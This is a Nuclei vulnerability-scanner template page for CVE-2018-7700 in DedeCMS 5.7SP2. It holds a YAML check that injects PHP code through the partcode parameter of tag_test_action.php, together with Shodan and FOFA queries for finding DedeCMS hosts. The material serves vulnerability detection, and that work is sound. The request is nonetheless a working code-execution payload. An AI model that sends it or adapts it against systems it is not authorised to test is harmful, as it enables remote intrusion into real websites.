Skip to content
Nuclei Templates

DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution

ID: CVE-2018-7700

Severity: high

Author: pikpikcu

Tags: cve,cve2018,dedecms,rce

Description

Section titled “Description”

DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.

YAML Source

Section titled “YAML Source”
id: CVE-2018-7700


info:
  name: DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution
  author: pikpikcu
  severity: high
  description: |
    DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.
  impact: |
    Successful exploitation of these vulnerabilities can lead to unauthorized actions performed on behalf of the user and execution of arbitrary code.
  remediation: |
    Apply the latest security patches and update to a newer version of DedeCMS.
  reference:
    - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7700
    - https://github.com/0ps/pocassistdb
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2018-7700
    cwe-id: CWE-352
    epss-score: 0.50599
    epss-percentile: 0.97528
    cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dedecms
    product: dedecms
    shodan-query:
      - http.html:"dedecms"
      - cpe:"cpe:2.3:a:dedecms:dedecms"
    fofa-query:
      - body="dedecms"
      - app="dedecms"
  tags: cve,cve2018,dedecms,rce


http:
  - method: GET
    path:
      - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "4cc32a3a81d2bb37271934a48ce4468a"


      - type: status
        status:
          - 200
# digest: 4a0a0047304502204571879e9e455e71d29b4b2f75a7d3bb5a1f30895bf42e882e2f7eb1c7a0507f022100d7ef41475840d7145e5b89c0ba63efd1f92b68a9a5b1aab390fdae981eb3ed06:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-7700.yaml"

View on Github